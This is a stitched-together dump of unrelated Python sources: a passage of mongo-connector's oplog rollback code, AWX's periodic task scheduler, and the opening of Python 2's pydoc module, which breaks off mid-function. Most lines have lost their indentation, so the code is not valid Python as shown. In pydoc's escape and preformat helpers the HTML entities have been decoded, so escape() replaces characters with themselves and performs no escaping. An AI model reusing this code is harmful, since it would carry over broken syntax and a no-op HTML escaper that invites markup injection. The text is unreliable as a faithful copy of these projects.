if checkpoint_ts_long < oldest_ts_long:
            # We've fallen behind; the checkpoint has fallen off the oplog.
return None, True
cursor_ts_long = util.bson_ts_to_long(first_oplog_entry["ts"])
if cursor_ts_long > checkpoint_ts_long:
# The checkpoint is not present in this oplog and the oplog
# did not rollover. This means that we connected to a new
# primary which did not replicate the checkpoint and which has
# new changes in its oplog for us to process.
# rollback, update checkpoint, and retry
LOG.debug("OplogThread: Initiating rollback from "
"get_oplog_cursor: new oplog entries found but "
"checkpoint is not present")
self.update_checkpoint(self.rollback())
return self.init_cursor()
# first entry has been consumed
return cursor, cursor_empty
def update_checkpoint(self, checkpoint):
"""Store the current checkpoint in the oplog progress dictionary.
"""
if checkpoint is not None and checkpoint != self.checkpoint:
self.checkpoint = checkpoint
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
# If we have the repr of our oplog collection
# in the dictionary, remove it and replace it
# with our replica set name.
# This allows an easy upgrade path from mongo-connector 2.3.
# For an explanation of the format change, see the comment in
# read_last_checkpoint.
oplog_dict.pop(str(self.oplog), None)
oplog_dict[self.replset_name] = checkpoint
LOG.debug("OplogThread: oplog checkpoint updated to %s",
checkpoint)
else:
LOG.debug("OplogThread: no checkpoint to update.")
def read_last_checkpoint(self):
"""Read the last checkpoint from the oplog progress dictionary.
"""
# In versions of mongo-connector 2.3 and before,
# we used the repr of the
# oplog collection as keys in the oplog_progress dictionary.
# In versions thereafter, we use the replica set name. For backwards
# compatibility, we check for both.
oplog_str = str(self.oplog)
ret_val = None
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
try:
# New format.
ret_val = oplog_dict[self.replset_name]
except KeyError:
try:
# Old format.
ret_val = oplog_dict[oplog_str]
except KeyError:
pass
LOG.debug("OplogThread: reading last checkpoint as %s " %
str(ret_val))
self.checkpoint = ret_val
return ret_val
def rollback(self):
"""Rollback target system to consistent state.
The strategy is to find the latest timestamp in the target system and
the largest timestamp in the oplog less than the latest target system
timestamp. This defines the rollback window and we just roll these
back until the oplog and target system are in consistent states.
"""
# Find the most recently inserted document in each target system
LOG.debug("OplogThread: Initiating rollback sequence to bring "
"system into a consistent state.")
last_docs = []
for dm in self.doc_managers:
dm.commit()
last_docs.append(dm.get_last_doc())
# Of these documents, which is the most recent?
last_inserted_doc = max(last_docs,
key=lambda x: x["_ts"] if x else float("-inf"))
# Nothing has been replicated. No need to rollback target systems
if last_inserted_doc is None:
return None
# Find the oplog entry that touched the most recent document.
# We'll use this to figure where to pick up the oplog later.
target_ts = util.long_to_bson_ts(last_inserted_doc['_ts'])
last_oplog_entry = util.retry_until_ok(
self.oplog.find_one,
{'ts': {'$lte': target_ts}, 'op': {'$ne': 'n'}},
sort=[('$natural', pymongo.DESCENDING)]
)
LOG.debug("OplogThread: last oplog entry is %s"
% str(last_oplog_entry))
# The oplog entry for the most recent document doesn't exist anymore.
# If we've fallen behind in the oplog, this will be caught later
if last_oplog_entry is None:
return None
# rollback_cutoff_ts happened *before* the rollback
rollback_cutoff_ts = last_oplog_entry['ts']
start_ts = util.bson_ts_to_long(rollback_cutoff_ts)
# timestamp of the most recent document on any target system
end_ts = last_inserted_doc['_ts']
for dm in self.doc_managers:
rollback_set = {} # this is a dictionary of ns:list of docs
# group potentially conflicted documents by namespace
for doc in dm.search(start_ts, end_ts):
if doc['ns'] in rollback_set:
rollback_set[doc['ns']].append(doc)
else:
rollback_set[doc['ns']] = [doc]
# retrieve these documents from MongoDB, either updating
# or removing them in each target system
for namespace, doc_list in rollback_set.items():
# Get the original namespace
original_namespace = self.namespace_config.unmap_namespace(
namespace)
if not original_namespace:
original_namespace = namespace
database, coll = original_namespace.split('.', 1)
obj_id = bson.objectid.ObjectId
bson_obj_id_list = [obj_id(doc['_id']) for doc in doc_list]
# Use connection to whole cluster if in sharded environment.
client = self.mongos_client or self.primary_client
to_update = util.retry_until_ok(
client[database][coll].find,
{'_id': {'$in': bson_obj_id_list}},
projection=self.namespace_config.projection(
original_namespace)
)
                # doc_list holds the docs currently in the target system;
                # to_update holds the corresponding docs fetched from MongoDB.
doc_hash = {} # Hash by _id
for doc in doc_list:
doc_hash[bson.objectid.ObjectId(doc['_id'])] = doc
to_index = []
def collect_existing_docs():
for doc in to_update:
if doc['_id'] in doc_hash:
del doc_hash[doc['_id']]
to_index.append(doc)
retry_until_ok(collect_existing_docs)
# Delete the inconsistent documents
LOG.debug("OplogThread: Rollback, removing inconsistent "
"docs.")
remov_inc = 0
for document_id in doc_hash:
try:
dm.remove(document_id, namespace,
util.bson_ts_to_long(rollback_cutoff_ts))
remov_inc += 1
                        LOG.debug(
                            "OplogThread: Rollback, removed %r " % document_id)
except errors.OperationFailed:
LOG.warning(
"Could not delete document during rollback: %r "
"This can happen if this document was already "
"removed by another rollback happening at the "
"same time." % doc
)
LOG.debug("OplogThread: Rollback, removed %d docs." %
remov_inc)
# Insert the ones from mongo
LOG.debug("OplogThread: Rollback, inserting documents "
"from mongo.")
insert_inc = 0
fail_insert_inc = 0
for doc in to_index:
try:
insert_inc += 1
dm.upsert(doc,
namespace,
util.bson_ts_to_long(rollback_cutoff_ts))
except errors.OperationFailed:
fail_insert_inc += 1
LOG.exception("OplogThread: Rollback, Unable to "
"insert %r" % doc)
LOG.debug("OplogThread: Rollback, Successfully inserted %d "
" documents and failed to insert %d"
" documents. Returning a rollback cutoff time of %s "
% (insert_inc, fail_insert_inc, str(rollback_cutoff_ts)))
return rollback_cutoff_ts
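# ---------------------------------------------------------------------------
# Illustrative sketch (not part of mongo-connector): rollback() above works by
# taking the newest document timestamp across all target systems and the
# newest oplog entry at or before it; those two timestamps bound the rollback
# window. The helper below is a minimal, self-contained illustration of that
# window computation, using plain integers in place of BSON timestamps; the
# function name and arguments are invented for the example.
def _rollback_window_sketch(target_doc_timestamps, oplog_timestamps):
    """Return (cutoff_ts, end_ts) or None if there is nothing to roll back."""
    if not target_doc_timestamps:
        return None  # nothing has been replicated yet
    end_ts = max(target_doc_timestamps)        # newest doc on any target system
    candidates = [ts for ts in oplog_timestamps if ts <= end_ts]
    if not candidates:
        return None  # the matching oplog entry has already rolled off
    cutoff_ts = max(candidates)                # newest oplog entry <= end_ts
    return cutoff_ts, end_ts
# Example: _rollback_window_sketch([5, 9, 7], [1, 4, 8, 12]) returns (8, 9);
# documents whose timestamps fall between the cutoff and the end of the window
# are the ones rollback() re-fetches from MongoDB and re-upserts or removes.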
|
periodic.py
|
import logging
import os
import time
from multiprocessing import Process
from django.conf import settings
from django.db import connections
from schedule import Scheduler
from awx.main.dispatch.worker import TaskWorker
logger = logging.getLogger('awx.main.dispatch.periodic')
class Scheduler(Scheduler):
def run_continuously(self):
idle_seconds = max(
1,
min(self.jobs).period.total_seconds() / 2
)
def run():
ppid = os.getppid()
            logger.warning('periodic beat started')
while True:
if os.getppid() != ppid:
                    # If the parent PID changes, this process has been orphaned
                    # (e.g., the parent died via segfault or SIGKILL), so we
                    # should exit too.
                    pid = os.getpid()
                    logger.warning(f'periodic beat exiting gracefully pid:{pid}')
raise SystemExit()
try:
for conn in connections.all():
# If the database connection has a hiccup, re-establish a new
# connection
conn.close_if_unusable_or_obsolete()
self.run_pending()
except Exception:
logger.exception(
'encountered an error while scheduling periodic tasks'
)
time.sleep(idle_seconds)
process = Process(target=run)
process.daemon = True
process.start()
def run_continuously():
scheduler = Scheduler()
for task in settings.CELERYBEAT_SCHEDULE.values():
apply_async = TaskWorker.resolve_callable(task['task']).apply_async
total_seconds = task['schedule'].total_seconds()
scheduler.every(total_seconds).seconds.do(apply_async)
scheduler.run_continuously()
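# ---------------------------------------------------------------------------
# Illustrative note (not part of AWX): run_continuously() above expects
# settings.CELERYBEAT_SCHEDULE to map schedule names to dicts carrying a
# 'task' dotted path and a 'schedule' object exposing total_seconds(); each
# entry is resolved via TaskWorker.resolve_callable() and its apply_async is
# scheduled every total_seconds() seconds. A hypothetical, minimal entry (the
# task path below is invented) would look like:
#
#     from datetime import timedelta
#     CELERYBEAT_SCHEDULE = {
#         'example-cleanup': {
#             'task': 'awx.main.tasks.example_cleanup',  # hypothetical task
#             'schedule': timedelta(seconds=60),
#         },
#     }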
|
pydoc.py
|
#!/usr/bin/env python
# -*- coding: latin-1 -*-
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on a given port on the
local machine to generate documentation web pages. Port number 0 can be
used to get an arbitrary unused port.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
https://docs.python.org/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__version__ = "$Revision: 88564 $"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import sys, imp, os, re, types, inspect, __builtin__, pkgutil, warnings
from repr import Repr
from string import expandtabs, find, join, lower, split, strip, rfind, rstrip
from traceback import extract_tb
try:
from collections import deque
except ImportError:
# Python 2.3 compatibility
class deque(list):
def popleft(self):
return self.pop(0)
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
result = _encode(result)
return result and re.sub('^ *\n', '', rstrip(result)) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = split(strip(doc), '\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not rstrip(lines[1]):
return lines[0], join(lines[2:], '\n')
return '', join(lines, '\n')
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = join(split(text, pairs[0]), pairs[1])
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
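# For example, cram('abcdefghij', 8) keeps both ends and elides the middle,
# returning 'ab...hij' (exactly 8 characters).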
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
return _re_stripid.sub(r'\1', text)
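# For example, stripid('<Foo instance at 0x01d2e3f4a5>') returns
# '<Foo instance>'.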
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
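# For example, _split_list([1, 2, 3, 4], lambda x: x % 2 == 0)
# returns ([2, 4], [1, 3]).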
def visiblename(name, all=None, obj=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant.
_hidden_names = ('__builtins__', '__doc__', '__file__', '__path__',
'__module__', '__name__', '__slots__', '__package__')
if name in _hidden_names: return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
# Namedtuples have public fields and methods with a single leading underscore
if name.startswith('_') and hasattr(obj, '_fields'):
return 1
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
def fixup(data):
name, kind, cls, value = data
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
return name, kind, cls, value
return map(fixup, inspect.classify_class_attrs(object))
# ----------------------------------------------------- Unicode support helpers
try:
_unicode = unicode
except NameError:
# If Python is built without Unicode support, the unicode type
# will not exist. Fake one that nothing will match, and make
    # the _encode function a no-op.
class _unicode(object):
pass
_encoding = 'ascii'
def _encode(text, encoding='ascii'):
return text
else:
import locale
_encoding = locale.getpreferredencoding()
def _encode(text, encoding=None):
if isinstance(text, unicode):
return text.encode(encoding or _encoding, 'xmlcharrefreplace')
else:
return text
def _binstr(obj):
# Ensure that we have an encoded (binary) string representation of obj,
# even if it is a unicode string.
if isinstance(obj, _unicode):
return obj.encode(_encoding, 'xmlcharrefreplace')
return str(obj)
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not strip(line):
line = file.readline()
if not line: break
line = strip(line)
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not strip(line):
line = file.readline()
if not line: break
result = strip(split(line, '"""')[0])
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (None, None))
if lastupdate is None or lastupdate < mtime:
info = inspect.getmoduleinfo(filename)
try:
file = open(filename)
except IOError:
# module can't be opened, so skip it
return None
if info and 'b' in info[2]: # binary modules have to be imported
try: module = imp.load_module('__temp__', file, filename, info[1:])
except: return None
result = module.__doc__.splitlines()[0] if module.__doc__ else None
del sys.modules['__temp__']
else: # text modules can be directly examined
result = source_synopsis(file)
file.close()
cache[filename] = (mtime, result)
return result
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, exc_info):
exc, value, tb = exc_info
self.filename = filename
self.exc = exc
self.value = value
self.tb = tb
def __str__(self):
exc = self.exc
if type(exc) is types.ClassType:
exc = exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
file = open(path, 'r')
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.close()
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
file.close()
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Avoid simply calling reload() because it leaves names in
# the currently loaded module lying around if they're not
# defined in the new source file. Instead, remove the
# module from sys.modules and re-import. Also remove any
# submodules because they won't appear in the newly loaded
# module's namespace if they're already in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport':
# The import error occurred directly in this function,
# which means there is no such module in the path.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in split(path, '.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
# ---------------------------------------------------- formatter base class
class Doc:
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError, message
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object,
basedir=os.path.join(sys.exec_prefix, "lib",
"python"+sys.version[0:3])):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS",
"https://docs.python.org/library")
basedir = os.path.normcase(basedir)
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'site-packages')))) and
object.__name__ not in ('xml.etree', 'test.pydoc_mod')):
if docloc.startswith(("http://", "https://")):
docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__.lower())
else:
docloc = os.path.join(docloc, object.__name__.lower() + ".html")
else:
docloc = None
return docloc
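    # For example, with PYTHONDOCS unset, getdocloc(gc) for the built-in 'gc'
    # module resolves to 'https://docs.python.org/library/gc'.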
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
return replace(text, '&', '&', '<', '<', '>', '>')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return _encode('''
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
<meta charset="utf-8">
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents), 'ascii')
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom> <br>
<font color="%s" face="helvetica, arial"> <br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
''' % (bgcol, fgcol, title, fgcol, extras or ' ')
def section(self, title, fgcol, bgcol, contents, width=6,
prelude='', marginalia=None, gap=' '):
"""Format a section with a heading."""
if marginalia is None:
marginalia = '<tt>' + ' ' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom> <br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(expandtabs(text))
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
' ', ' ', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)//cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100//cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, data):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = data
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '"')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif selfdot:
# Create a link for methods like 'self.method(...)'
# and use <strong> for attributes like 'self.attr'
if text[end:end+1] == '(':
results.append('self.' + self.namelink(name, methods))
else:
results.append('self.<strong>%s</strong>' % name)
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return join(results, '')
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + join(parents, ', ') + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = split(name, '.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
(join(parts[:i+1], '.'), parts[i]))
linkedname = join(links + parts[-1:], '.')
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = '<a href="file:%s">%s</a>' % (url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = _binstr(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(_binstr(object.__date__)))
if info:
head = head + ' (%s)' % join(info, ', ')
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
def isnonbuiltinmodule(obj):
return inspect.ismodule(obj) and obj is not __builtin__
modules = inspect.getmembers(object, isnonbuiltinmodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda key_value, s=self: s.modulelink(key_value[1]))
result = result + self.bigsection(
'Modules', '#ffffff', '#aa55cc', contents)
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', join(contents, '<br>\n'))
if hasattr(object, '__author__'):
contents = self.markup(_binstr(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(_binstr(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
